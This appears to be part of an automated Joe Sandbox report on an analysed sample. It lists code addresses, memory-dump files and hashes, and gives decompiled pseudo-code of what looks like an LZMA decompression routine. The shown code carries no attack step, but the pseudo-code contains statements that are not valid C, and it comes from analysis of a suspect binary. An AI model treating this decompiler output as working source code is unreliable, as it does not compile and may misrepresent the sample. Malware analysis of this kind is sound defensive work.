                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407056
                                                          0x00407056
                                                          0x00407059
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00407447
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00407447
                                                          0x00407447
                                                          0x00000000
                                                          0x0040744d
                                                          0x00407447
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x004070cf
                                                          0x004070cf
                                                          0x004070d3
                                                          0x00407599
                                                          0x00000000
                                                          0x00407599
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e4
                                                          0x004070e7
                                                          0x004070ea
                                                          0x004070ed
                                                          0x004070f0
                                                          0x004070f3
                                                          0x004070f6
                                                          0x004070f7
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070f9
                                                          0x004070fc
                                                          0x004070ff
                                                          0x00407102
                                                          0x00407105
                                                          0x00407105
                                                          0x00407105
                                                          0x00407108
                                                          0x0040710a
                                                          0x0040710a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x0040710d
                                                          0x0040710d
                                                          0x00000000
                                                          0x0040710d
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x004075fa
                                                          0x004075fa
                                                          0x00000000
                                                          0x004075fa
                                                          0x00407447
                                                          0x004073ce
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407002

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                          • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                          • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                          • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E0040711C() {
                                                          				unsigned short _t531;
                                                          				signed int _t532;
                                                          				void _t533;
                                                          				signed int _t534;
                                                          				signed int _t535;
                                                          				signed int _t565;
                                                          				signed int _t568;
                                                          				signed int _t589;
                                                          				signed int* _t606;
                                                          				void* _t613;
                                                          
                                                          				L0:
                                                          				while(1) {
                                                          					L0:
                                                          					if( *(_t613 - 0x40) != 0) {
                                                          						 *(_t613 - 0x84) = 0xb;
                                                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                          						goto L132;
                                                          					} else {
                                                          						__eax =  *(__ebp - 0x28);
                                                          						L88:
                                                          						 *(__ebp - 0x2c) = __eax;
                                                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          						L89:
                                                          						__eax =  *(__ebp - 4);
                                                          						 *(__ebp - 0x80) = 0x15;
                                                          						__eax =  *(__ebp - 4) + 0xa68;
                                                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                          						L69:
                                                          						 *(__ebp - 0x84) = 0x12;
                                                          						while(1) {
                                                          							L132:
                                                          							 *(_t613 - 0x54) = _t606;
                                                          							while(1) {
                                                          								L133:
                                                          								_t531 =  *_t606;
                                                          								_t589 = _t531 & 0x0000ffff;
                                                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          								if( *(_t613 - 0xc) >= _t565) {
                                                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          									 *(_t613 - 0x40) = 1;
                                                          									_t532 = _t531 - (_t531 >> 5);
                                                          									 *_t606 = _t532;
                                                          								} else {
                                                          									 *(_t613 - 0x10) = _t565;
                                                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          								}
                                                          								if( *(_t613 - 0x10) >= 0x1000000) {
                                                          									goto L139;
                                                          								}
                                                          								L137:
                                                          								if( *(_t613 - 0x6c) == 0) {
                                                          									 *(_t613 - 0x88) = 5;
                                                          									L170:
                                                          									_t568 = 0x22;
                                                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                          									_t535 = 0;
                                                          									L172:
                                                          									return _t535;
                                                          								}
                                                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          								L139:
                                                          								_t533 =  *(_t613 - 0x84);
                                                          								while(1) {
                                                          									 *(_t613 - 0x88) = _t533;
                                                          									while(1) {
                                                          										L1:
                                                          										_t534 =  *(_t613 - 0x88);
                                                          										if(_t534 > 0x1c) {
                                                          											break;
                                                          										}
                                                          										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                          											case 0:
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          												_t534 =  *( *(_t613 - 0x70));
                                                          												if(_t534 > 0xe1) {
                                                          													goto L171;
                                                          												}
                                                          												_t538 = _t534 & 0x000000ff;
                                                          												_push(0x2d);
                                                          												asm("cdq");
                                                          												_pop(_t570);
                                                          												_push(9);
                                                          												_pop(_t571);
                                                          												_t609 = _t538 / _t570;
                                                          												_t540 = _t538 % _t570 & 0x000000ff;
                                                          												asm("cdq");
                                                          												_t604 = _t540 % _t571 & 0x000000ff;
                                                          												 *(_t613 - 0x3c) = _t604;
                                                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                          													L10:
                                                          													if(_t612 == 0) {
                                                          														L12:
                                                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          														goto L15;
                                                          													} else {
                                                          														goto L11;
                                                          													}
                                                          													do {
                                                          														L11:
                                                          														_t612 = _t612 - 1;
                                                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                          													} while (_t612 != 0);
                                                          													goto L12;
                                                          												}
                                                          												if( *(_t613 - 4) != 0) {
                                                          													GlobalFree( *(_t613 - 4));
                                                          												}
                                                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                          												 *(_t613 - 4) = _t534;
                                                          												if(_t534 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                          													goto L10;
                                                          												}
                                                          											case 1:
                                                          												L13:
                                                          												__eflags =  *(_t613 - 0x6c);
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													 *(_t613 - 0x88) = 1;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                          												_t45 = _t613 - 0x48;
                                                          												 *_t45 =  *(_t613 - 0x48) + 1;
                                                          												__eflags =  *_t45;
                                                          												L15:
                                                          												if( *(_t613 - 0x48) < 4) {
                                                          													goto L13;
                                                          												}
                                                          												_t546 =  *(_t613 - 0x40);
                                                          												if(_t546 ==  *(_t613 - 0x74)) {
                                                          													L20:
                                                          													 *(_t613 - 0x48) = 5;
                                                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                          													goto L23;
                                                          												}
                                                          												 *(_t613 - 0x74) = _t546;
                                                          												if( *(_t613 - 8) != 0) {
                                                          													GlobalFree( *(_t613 - 8));
                                                          												}
                                                          												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                          												 *(_t613 - 8) = _t534;
                                                          												if(_t534 == 0) {
                                                          													goto L171;
                                                          												} else {
                                                          													goto L20;
                                                          												}
                                                          											case 2:
                                                          												L24:
                                                          												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                          												 *(_t613 - 0x84) = 6;
                                                          												 *(_t613 - 0x4c) = _t553;
                                                          												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                          												L132:
                                                          												 *(_t613 - 0x54) = _t606;
                                                          												goto L133;
                                                          											case 3:
                                                          												L21:
                                                          												__eflags =  *(_t613 - 0x6c);
                                                          												if( *(_t613 - 0x6c) == 0) {
                                                          													 *(_t613 - 0x88) = 3;
                                                          													goto L170;
                                                          												}
                                                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                          												_t67 = _t613 - 0x70;
                                                          												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                          												__eflags =  *_t67;
                                                          												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                          												L23:
                                                          												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                          												if( *(_t613 - 0x48) != 0) {
                                                          													goto L21;
                                                          												}
                                                          												goto L24;
                                                          											case 4:
                                                          												L133:
                                                          												_t531 =  *_t606;
                                                          												_t589 = _t531 & 0x0000ffff;
                                                          												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                          												if( *(_t613 - 0xc) >= _t565) {
                                                          													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                          													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                          													 *(_t613 - 0x40) = 1;
                                                          													_t532 = _t531 - (_t531 >> 5);
                                                          													 *_t606 = _t532;
                                                          												} else {
                                                          													 *(_t613 - 0x10) = _t565;
                                                          													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                          													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                          												}
                                                          												if( *(_t613 - 0x10) >= 0x1000000) {
                                                          													goto L139;
                                                          												}
                                                          											case 5:
                                                          												goto L137;
                                                          											case 6:
                                                          												__edx = 0;
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x34) = 1;
                                                          													 *(__ebp - 0x84) = 7;
                                                          													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t613 - 0x54) = _t606;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                          												__esi =  *(__ebp - 0x60);
                                                          												__cl = 8;
                                                          												__cl = 8 -  *(__ebp - 0x3c);
                                                          												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                          												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                          												__ecx =  *(__ebp - 0x3c);
                                                          												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                          												__ecx =  *(__ebp - 4);
                                                          												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                          												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                          												__eflags =  *(__ebp - 0x38) - 4;
                                                          												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                          												if( *(__ebp - 0x38) >= 4) {
                                                          													__eflags =  *(__ebp - 0x38) - 0xa;
                                                          													if( *(__ebp - 0x38) >= 0xa) {
                                                          														_t98 = __ebp - 0x38;
                                                          														 *_t98 =  *(__ebp - 0x38) - 6;
                                                          														__eflags =  *_t98;
                                                          													} else {
                                                          														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                          													}
                                                          												} else {
                                                          													 *(__ebp - 0x38) = 0;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x34) - __edx;
                                                          												if( *(__ebp - 0x34) == __edx) {
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													goto L61;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__ecx =  *(__ebp - 8);
                                                          													__ebx = 0;
                                                          													__ebx = 1;
                                                          													__al =  *((intOrPtr*)(__eax + __ecx));
                                                          													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                          													goto L41;
                                                          												}
                                                          											case 7:
                                                          												__eflags =  *(__ebp - 0x40) - 1;
                                                          												if( *(__ebp - 0x40) != 1) {
                                                          													__eax =  *(__ebp - 0x24);
                                                          													 *(__ebp - 0x80) = 0x16;
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x28);
                                                          													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                          													__eax = 0;
                                                          													__eflags =  *(__ebp - 0x38) - 7;
                                                          													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          													__al = __al & 0x000000fd;
                                                          													__eax = (__eflags >= 0) - 1 + 0xa;
                                                          													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                          													__eax =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 4) + 0x664;
                                                          													__eflags = __eax;
                                                          													 *(__ebp - 0x58) = __eax;
                                                          													goto L69;
                                                          												}
                                                          												__eax =  *(__ebp - 4);
                                                          												__ecx =  *(__ebp - 0x38);
                                                          												 *(__ebp - 0x84) = 8;
                                                          												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											case 8:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 4);
                                                          													__ecx =  *(__ebp - 0x38);
                                                          													 *(__ebp - 0x84) = 0xa;
                                                          													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x38);
                                                          													__ecx =  *(__ebp - 4);
                                                          													__eax =  *(__ebp - 0x38) + 0xf;
                                                          													 *(__ebp - 0x84) = 9;
                                                          													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                          													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                          												}
                                                          												while(1) {
                                                          													L132:
                                                          													 *(_t613 - 0x54) = _t606;
                                                          													goto L133;
                                                          												}
                                                          											case 9:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													goto L89;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x60);
                                                          												if( *(__ebp - 0x60) == 0) {
                                                          													goto L171;
                                                          												}
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                          												__eflags = _t259;
                                                          												0 | _t259 = _t259 + _t259 + 9;
                                                          												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                          												goto L76;
                                                          											case 0xa:
                                                          												goto L0;
                                                          											case 0xb:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__ecx =  *(__ebp - 0x24);
                                                          													__eax =  *(__ebp - 0x20);
                                                          													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                          												} else {
                                                          													__eax =  *(__ebp - 0x24);
                                                          												}
                                                          												__ecx =  *(__ebp - 0x28);
                                                          												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                          												goto L88;
                                                          											case 0xc:
                                                          												L99:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xc;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t334 = __ebp - 0x70;
                                                          												 *_t334 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t334;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												__eax =  *(__ebp - 0x2c);
                                                          												goto L101;
                                                          											case 0xd:
                                                          												L37:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xd;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t122 = __ebp - 0x70;
                                                          												 *_t122 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t122;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L39:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                          													goto L48;
                                                          												}
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													goto L54;
                                                          												}
                                                          												L41:
                                                          												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                          												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                          												 *(__ebp - 0x48) = __eax;
                                                          												__eax = __eax + 1;
                                                          												__eax = __eax << 8;
                                                          												__eax = __eax + __ebx;
                                                          												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edx = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
